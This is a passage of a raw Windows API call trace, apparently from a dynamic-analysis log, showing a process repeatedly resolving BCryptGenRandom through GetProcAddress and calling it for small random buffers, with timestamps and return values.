0x7ffc5bcc36b0 [0221.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0177b, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a0177b) returned 0x0 [0221.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01796, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a01796) returned 0x0 [0221.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a017c4, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a017c4) returned 0x0 [0221.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: 